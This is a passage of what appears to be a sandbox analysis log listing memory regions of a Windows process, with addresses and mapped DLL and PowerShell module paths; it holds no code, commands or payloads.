519 start_va = 0x3b50000 end_va = 0x3b9bfff monitored = 1 entry_point = 0x3b6fcc6 region_type = mapped_file name = "system.transactions.dll" filename = "\\Windows\\Microsoft.NET\\assembly\\GAC_32\\System.Transactions\\v4.0_4.0.0.0__b77a5c561934e089\\System.Transactions.dll" (normalized: "c:\\windows\\microsoft.net\\assembly\\gac_32\\system.transactions\\v4.0_4.0.0.0__b77a5c561934e089\\system.transactions.dll") Region: id = 520 start_va = 0x3b50000 end_va = 0x3b9bfff monitored = 1 entry_point = 0x3b6fcc6 region_type = mapped_file name = "system.transactions.dll" filename = "\\Windows\\Microsoft.NET\\assembly\\GAC_32\\System.Transactions\\v4.0_4.0.0.0__b77a5c561934e089\\System.Transactions.dll" (normalized: "c:\\windows\\microsoft.net\\assembly\\gac_32\\system.transactions\\v4.0_4.0.0.0__b77a5c561934e089\\system.transactions.dll") Region: id = 521 start_va = 0x3b50000 end_va = 0x3b9bfff monitored = 1 entry_point = 0x3b6fcc6 region_type = mapped_file name = "system.transactions.dll" filename = "\\Windows\\Microsoft.NET\\assembly\\GAC_32\\System.Transactions\\v4.0_4.0.0.0__b77a5c561934e089\\System.Transactions.dll" (normalized: "c:\\windows\\microsoft.net\\assembly\\gac_32\\system.transactions\\v4.0_4.0.0.0__b77a5c561934e089\\system.transactions.dll") Region: id = 522 start_va = 0x6a220000 end_va = 0x6a29ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "microsoft.management.infrastructure.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\Microsoft.Mf49f6405#\\f0821980bfe2fc8375ccfc37dbe6e9d8\\Microsoft.Management.Infrastructure.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\microsoft.mf49f6405#\\f0821980bfe2fc8375ccfc37dbe6e9d8\\microsoft.management.infrastructure.ni.dll") Region: id = 523 start_va = 0x6a870000 end_va = 0x6a8b6fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "system.numerics.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Numerics\\e7d6ed984300c7212c6e682c4f730b1e\\System.Numerics.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.numerics\\e7d6ed984300c7212c6e682c4f730b1e\\system.numerics.ni.dll") Region: id = 524 start_va = 0xd60000 end_va = 0xd6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000d60000" filename = "" Region: id = 525 start_va = 0x4150000 end_va = 0x418ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004150000" filename = "" Region: id = 526 start_va = 0x7ffae000 end_va = 0x7ffaefff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffae000" filename = "" Region: id = 527 start_va = 0x75720000 end_va = 0x75727fff monitored = 0 entry_point = 0x757210e9 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll") Region: id = 528 start_va = 0x75740000 end_va = 0x7575afff monitored = 0 entry_point = 0x757493b9 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 529 start_va = 0xd70000 end_va = 0xd7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000d70000" filename = "" Region: id = 530 start_va = 0x64260000 end_va = 0x64364fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "system.configuration.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Configuration\\96f7edb07b12303f0ec2595c7f3778c7\\System.Configuration.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.configuration\\96f7edb07b12303f0ec2595c7f3778c7\\system.configuration.ni.dll") Region: id = 531 start_va = 0x3b50000 end_va = 0x3bcffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003b50000" filename = "" Region: id = 532 start_va = 0x19f0000 end_va = 0x19fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000019f0000" filename = "" Region: id = 533 start_va = 0x1a00000 end_va = 0x1a0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001a00000" filename = "" Region: id = 534 start_va = 0x1a10000 end_va = 0x1a1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001a10000" filename = "" Region: id = 535 start_va = 0x3bd0000 end_va = 0x3bdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003bd0000" filename = "" Region: id = 536 start_va = 0x3c20000 end_va = 0x3c2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003c20000" filename = "" Region: id = 537 start_va = 0x3c30000 end_va = 0x3c3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003c30000" filename = "" Region: id = 538 start_va = 0x3c40000 end_va = 0x3c4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003c40000" filename = "" Region: id = 539 start_va = 0x3c90000 end_va = 0x3c9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003c90000" filename = "" Region: id = 540 start_va = 0x3ca0000 end_va = 0x3caffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003ca0000" filename = "" Region: id = 541 start_va = 0x3cb0000 end_va = 0x3cbffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003cb0000" filename = "" Region: id = 542 start_va = 0x3cc0000 end_va = 0x3ccffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003cc0000" filename = "" Region: id = 543 start_va = 0x640c0000 end_va = 0x64257fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "microsoft.csharp.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\Microsoft.CSharp\\f73f48afb5512225dedaee9c88ac5050\\Microsoft.CSharp.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\microsoft.csharp\\f73f48afb5512225dedaee9c88ac5050\\microsoft.csharp.ni.dll") Region: id = 544 start_va = 0x3ce0000 end_va = 0x3ceffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003ce0000" filename = "" Region: id = 545 start_va = 0x3cf0000 end_va = 0x3cfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003cf0000" filename = "" Region: id = 546 start_va = 0x3d00000 end_va = 0x3d0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d00000" filename = "" Region: id = 547 start_va = 0x3d00000 end_va = 0x3d0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d00000" filename = "" Region: id = 548 start_va = 0x40f0000 end_va = 0x40fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000040f0000" filename = "" Region: id = 549 start_va = 0x4530000 end_va = 0x4ebffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004530000" filename = "" Region: id = 550 start_va = 0x7ffd8000 end_va = 0x7ffd8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffd8000" filename = "" Region: id = 551 start_va = 0x75800000 end_va = 0x7580dfff monitored = 0 entry_point = 0x75801235 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll") Region: id = 552 start_va = 0x4f00000 end_va = 0x4f3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004f00000" filename = "" Region: id = 553 start_va = 0x7ffad000 end_va = 0x7ffadfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffad000" filename = "" Region: id = 554 start_va = 0x4ec0000 end_va = 0x4efffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004ec0000" filename = "" Region: id = 555 start_va = 0x7ffac000 end_va = 0x7ffacfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffac000" filename = "" Region: id = 556 start_va = 0x40f0000 end_va = 0x4100fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000040f0000" filename = "" Region: id = 557 start_va = 0x4110000 end_va = 0x411ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004110000" filename = "" Region: id = 558 start_va = 0x4f40000 end_va = 0x5f3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004f40000" filename = "" Region: id = 559 start_va = 0x4120000 end_va = 0x414ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004120000" filename = "" Region: id = 560 start_va = 0x4430000 end_va = 0x446ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004430000" filename = "" Region: id = 561 start_va = 0x7ffab000 end_va = 0x7ffabfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffab000" filename = "" Region: id = 562 start_va = 0xc70000 end_va = 0xc7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000c70000" filename = "" Region: id = 563 start_va = 0xc70000 end_va = 0xc7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000c70000" filename = "" Region: id = 564 start_va = 0xc80000 end_va = 0xc8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000c80000" filename = "" Region: id = 565 start_va = 0xc80000 end_va = 0xc8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000c80000" filename = "" Region: id = 566 start_va = 0x5f40000 end_va = 0x6f3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005f40000" filename = "" Region: id = 567 start_va = 0x4380000 end_va = 0x43cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004380000" filename = "" Region: id = 568 start_va = 0x44a0000 end_va = 0x44dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000044a0000" filename = "" Region: id = 569 start_va = 0x6f50000 end_va = 0x6f8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006f50000" filename = "" Region: id = 570 start_va = 0x7ffaa000 end_va = 0x7ffaafff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffaa000" filename = "" Region: id = 571 start_va = 0x7ffab000 end_va = 0x7ffabfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffab000" filename = "" Region: id = 572 start_va = 0xc80000 end_va = 0xc81fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "powershellget.psd1" filename = "\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget\\1.0.0.1\\powershellget.psd1") Region: id = 573 start_va = 0x6f90000 end_va = 0x738ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006f90000" filename = "" Region: id = 574 start_va = 0x4120000 end_va = 0x4121fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "powershellget.psd1" filename = "\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget\\1.0.0.1\\powershellget.psd1") Region: id = 575 start_va = 0x6f90000 end_va = 0x738ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006f90000" filename = "" Region: id = 576 start_va = 0xc80000 end_va = 0xc8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000c80000" filename = "" Region: id = 577 start_va = 0x4120000 end_va = 0x4120fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "microsoft.powershell.utility.psd1" filename = "\\Windows\\System32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.utility.psd1") Region: id = 578 start_va = 0x6f90000 end_va = 0x738ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006f90000" filename = "" Region: id = 579 start_va = 0x4130000 end_va = 0x4130fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "microsoft.powershell.utility.psd1" filename = "\\Windows\\System32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.utility.psd1") Region: id = 580 start_va = 0x6f90000 end_va = 0x738ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006f90000" filename = "" Region: id = 581 start_va = 0x63550000 end_va = 0x640bdfff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "microsoft.powershell.commands.utility.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\Microsoft.P521220ea#\\45d6173bf76d6c7a206f8f41403f947b\\Microsoft.PowerShell.Commands.Utility.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\microsoft.p521220ea#\\45d6173bf76d6c7a206f8f41403f947b\\microsoft.powershell.commands.utility.ni.dll") Region: id = 582 start_va = 0x69f20000 end_va = 0x69f47fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "system.configuration.install.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Confe64a9051#\\1561b93d6d25c4a9c3e2659ab29a5e73\\System.Configuration.Install.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.confe64a9051#\\1561b93d6d25c4a9c3e2659ab29a5e73\\system.configuration.install.ni.dll") Region: id = 583 start_va = 0x4120000 end_va = 0x4127fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "microsoft.powershell.utility.psm1" filename = "\\Windows\\System32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.utility.psm1") Region: id = 584 start_va = 0x4480000 end_va = 0x44bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004480000" filename = "" Region: id = 585 start_va = 0x6f90000 end_va = 0x738ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006f90000" filename = "" Region: id = 586 start_va = 0x4130000 end_va = 0x4137fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "microsoft.powershell.utility.psm1" filename = "\\Windows\\System32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.utility.psm1") Region: id = 587 start_va = 0x6f90000 end_va = 0x738ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006f90000" filename = "" Region: id = 588 start_va = 0x4120000 end_va = 0x412ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004120000" filename = "" Region: id = 589 start_va = 0x4130000 end_va = 0x4137fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "microsoft.powershell.utility.psm1" filename = "\\Windows\\System32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.utility.psm1") Region: id = 590 start_va = 0x6f90000 end_va = 0x738ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006f90000" filename = "" Region: id = 591 start_va = 0x4140000 end_va = 0x4147fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "microsoft.powershell.utility.psm1" filename = "\\Windows\\System32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.utility.psm1") Region: id = 592 start_va = 0x6f90000 end_va = 0x738ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006f90000" filename = "" Region: id = 593 start_va = 0x4130000 end_va = 0x413ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004130000" filename = "" Region: id = 594 start_va = 0x4140000 end_va = 0x414ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 722 start_va = 0x4140000 end_va = 0x4140fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 723 start_va = 0x4190000 end_va = 0x419ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004190000" filename = "" Region: id = 724 start_va = 0x41e0000 end_va = 0x41effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000041e0000" filename = "" Region: id = 725 start_va = 0x41e0000 end_va = 0x41effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000041e0000" filename = "" Region: id = 726 start_va = 0x41e0000 end_va = 0x41effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000041e0000" filename = "" Region: id = 727 start_va = 0x6f90000 end_va = 0x6fcffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006f90000" filename = "" Region: id = 728 start_va = 0x7ffab000 end_va = 0x7ffabfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffab000" filename = "" Region: id = 729 start_va = 0x41e0000 end_va = 0x41effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000041e0000" filename = "" Region: id = 730 start_va = 0x43d0000 end_va = 0x44cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000043d0000" filename = "" Region: id = 731 start_va = 0x41e0000 end_va = 0x41effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000041e0000" filename = "" Region: id = 732 start_va = 0x41e0000 end_va = 0x41effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000041e0000" filename = "" Region: id = 733 start_va = 0x41e0000 end_va = 0x41effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000041e0000" filename = "" Region: id = 734 start_va = 0x41e0000 end_va = 0x41effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000041e0000" filename = "" Region: id = 735 start_va = 0x41e0000 end_va = 0x41effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000041e0000" filename = "" Region: id = 736 start_va = 0x41e0000 end_va = 0x41effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000041e0000" filename = "" Region: id = 737 start_va = 0x41e0000 end_va = 0x41effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000041e0000" filename = "" Region: id = 738 start_va = 0x41e0000 end_va = 0x41effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000041e0000" filename = "" Region: id = 739 start_va = 0x41e0000 end_va = 0x41effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000041e0000" filename = "" Region: id = 740 start_va = 0x41e0000 end_va = 0x41effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000041e0000" filename = "" Region: id = 741 start_va = 0x41e0000 end_va = 0x41effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000041e0000" filename = "" Region: id = 742 start_va = 0x6fd0000 end_va = 0x700ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006fd0000" filename = "" Region: id = 743 start_va = 0x7ffa9000 end_va = 0x7ffa9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffa9000" filename = "" Region: id = 744 start_va = 0x41e0000 end_va = 0x41effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000041e0000" filename = "" Region: id = 745 start_va = 0x41e0000 end_va = 0x41effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000041e0000" filename = "" Region: id = 746 start_va = 0x41e0000 end_va = 0x41effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000041e0000" filename = "" Region: id = 747 start_va = 0x41f0000 end_va = 0x41fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000041f0000" filename = "" Region: id = 748 start_va = 0x41e0000 end_va = 0x41effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000041e0000" filename = "" Region: id = 749 start_va = 0x41f0000 end_va = 0x41fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000041f0000" filename = "" Region: id = 750 start_va = 0x44d0000 end_va = 0x44dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000044d0000" filename = "" Region: id = 751 start_va = 0x41f0000 end_va = 0x41fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000041f0000" filename = "" Region: id = 752 start_va = 0x41f0000 end_va = 0x41fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000041f0000" filename = "" Region: id = 753 start_va = 0x41e0000 end_va = 0x41effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000041e0000" filename = "" Region: id = 754 start_va = 0x41f0000 end_va = 0x41fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000041f0000" filename = "" Region: id = 755 start_va = 0x44d0000 end_va = 0x44dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000044d0000" filename = "" Region: id = 756 start_va = 0x41f0000 end_va = 0x41fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000041f0000" filename = "" Region: id = 757 start_va = 0x41e0000 end_va = 0x41effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000041e0000" filename = "" Region: id = 758 start_va = 0x41e0000 end_va = 0x41effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000041e0000" filename = "" Region: id = 759 start_va = 0x41e0000 end_va = 0x41effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000041e0000" filename = "" Region: id = 760 start_va = 0x41e0000 end_va = 0x41effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000041e0000" filename = "" Region: id = 761 start_va = 0x41e0000 end_va = 0x41effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000041e0000" filename = "" Region: id = 762 start_va = 0x41f0000 end_va = 0x41fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000041f0000" filename = "" Region: id = 763 start_va = 0x41e0000 end_va = 0x41e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000041e0000" filename = "" Region: id = 764 start_va = 0x44d0000 end_va = 0x44e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000044d0000" filename = "" Region: id = 765 start_va = 0x41f0000 end_va = 0x41fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000041f0000" filename = "" Region: id = 766 start_va = 0x41f0000 end_va = 0x41fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000041f0000" filename = "" Region: id = 767 start_va = 0x44f0000 end_va = 0x4504fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000044f0000" filename = "" Region: id = 768 start_va = 0x765e0000 end_va = 0x766d4fff monitored = 0 entry_point = 0x765e1865 region_type = mapped_file name = "wininet.dll" filename = "\\Windows\\System32\\wininet.dll" (normalized: "c:\\windows\\system32\\wininet.dll") Region: id = 769 start_va = 0x76320000 end_va = 0x76455fff monitored = 0 entry_point = 0x76321b35 region_type = mapped_file name = "urlmon.dll" filename = "\\Windows\\System32\\urlmon.dll" (normalized: "c:\\windows\\system32\\urlmon.dll") Region: id = 770 start_va = 0x767c0000 end_va = 0x769bafff monitored = 0 entry_point = 0x767c22d9 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\System32\\iertutil.dll" (normalized: "c:\\windows\\system32\\iertutil.dll") Region: id = 771 start_va = 0x725c0000 end_va = 0x725d1fff monitored = 0 entry_point = 0x725c1200 region_type = mapped_file name = "mpr.dll" filename = "\\Windows\\System32\\mpr.dll" (normalized: "c:\\windows\\system32\\mpr.dll") Region: id = 772 start_va = 0x73840000 end_va = 0x738e5fff monitored = 0 entry_point = 0x738aa2f0 region_type = mapped_file name = "fastprox.dll" filename = "\\Windows\\System32\\wbem\\fastprox.dll" (normalized: "c:\\windows\\system32\\wbem\\fastprox.dll") Region: id = 773 start_va = 0x73ae0000 end_va = 0x73b40fff monitored = 0 entry_point = 0x73b1bf40 region_type = mapped_file name = "wbemcomn2.dll" filename = "\\Windows\\System32\\wbemcomn2.dll" (normalized: "c:\\windows\\system32\\wbemcomn2.dll") Region: id = 774 start_va = 0x75400000 end_va = 0x75416fff monitored = 0 entry_point = 0x75403574 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 775 start_va = 0x73820000 end_va = 0x73837fff monitored = 0 entry_point = 0x73821335 region_type = mapped_file name = "ntdsapi.dll" filename = "\\Windows\\System32\\ntdsapi.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll") Region: id = 776 start_va = 0x73810000 end_va = 0x7381afff monitored = 0 entry_point = 0x738152a0 region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\System32\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemprox.dll") Region: id = 777 start_va = 0x73620000 end_va = 0x7362efff monitored = 0 entry_point = 0x736293d0 region_type = mapped_file name = "wbemsvc.dll" filename = "\\Windows\\System32\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemsvc.dll") Region: id = 1523 start_va = 0x1a60000 end_va = 0x1a60fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "mpr.dll.mui" filename = "\\Windows\\System32\\en-US\\mpr.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\mpr.dll.mui") Region: id = 1524 start_va = 0x41f0000 end_va = 0x422ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000041f0000" filename = "" Region: id = 1525 start_va = 0x6fb0000 end_va = 0x6feffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006fb0000" filename = "" Region: id = 1526 start_va = 0x6ff0000 end_va = 0x702ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006ff0000" filename = "" Region: id = 1527 start_va = 0x7050000 end_va = 0x708ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007050000" filename = "" Region: id = 1528 start_va = 0x7110000 end_va = 0x714ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007110000" filename = "" Region: id = 1529 start_va = 0x7200000 end_va = 0x723ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007200000" filename = "" Region: id = 1530 start_va = 0x7270000 end_va = 0x72affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007270000" filename = "" Region: id = 1531 start_va = 0x73a0000 end_va = 0x73dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000073a0000" filename = "" Region: id = 1532 start_va = 0x7ffa7000 end_va = 0x7ffa7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffa7000" filename = "" Region: id = 1533 start_va = 0x7ffa8000 end_va = 0x7ffa8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffa8000" filename = "" Region: id = 1534 start_va = 0x7ffa9000 end_va = 0x7ffa9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffa9000" filename = "" Region: id = 1535 start_va = 0x7ffab000 end_va = 0x7ffabfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffab000" filename = "" Region: id = 1536 start_va = 0x7ffae000 end_va = 0x7ffaefff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffae000" filename = "" Region: id = 1537 start_va = 0x7ffd4000 end_va = 0x7ffd4fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffd4000" filename = "" Region: id = 1538 start_va = 0x7ffd5000 end_va = 0x7ffd5fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffd5000" filename = "" Region: id = 1539 start_va = 0x7ffd9000 end_va = 0x7ffd9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffd9000" filename = "" Region: id = 1540 start_va = 0x74a00000 end_va = 0x74a07fff monitored = 0 entry_point = 0x74a01356 region_type = mapped_file name = "drprov.dll" filename = "\\Windows\\System32\\drprov.dll" (normalized: "c:\\windows\\system32\\drprov.dll") Region: id = 1541 start_va = 0x757d0000 end_va = 0x757f8fff monitored = 0 entry_point = 0x757d6b19 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 1542 start_va = 0x709e0000 end_va = 0x709f3fff monitored = 0 entry_point = 0x709e15c9 region_type = mapped_file name = "ntlanman.dll" filename = "\\Windows\\System32\\ntlanman.dll" (normalized: "c:\\windows\\system32\\ntlanman.dll") Region: id = 1543 start_va = 0x709c0000 end_va = 0x709d6fff monitored = 0 entry_point = 0x709c1549 region_type = mapped_file name = "davclnt.dll" filename = "\\Windows\\System32\\davclnt.dll" (normalized: "c:\\windows\\system32\\davclnt.dll") Region: id = 1544 start_va = 0x749f0000 end_va = 0x749f7fff monitored = 0 entry_point = 0x749f3c87 region_type = mapped_file name = "davhlpr.dll" filename = "\\Windows\\System32\\davhlpr.dll" (normalized: "c:\\windows\\system32\\davhlpr.dll") Region: id = 1545 start_va = 0x73fb0000 end_va = 0x73fbefff monitored = 0 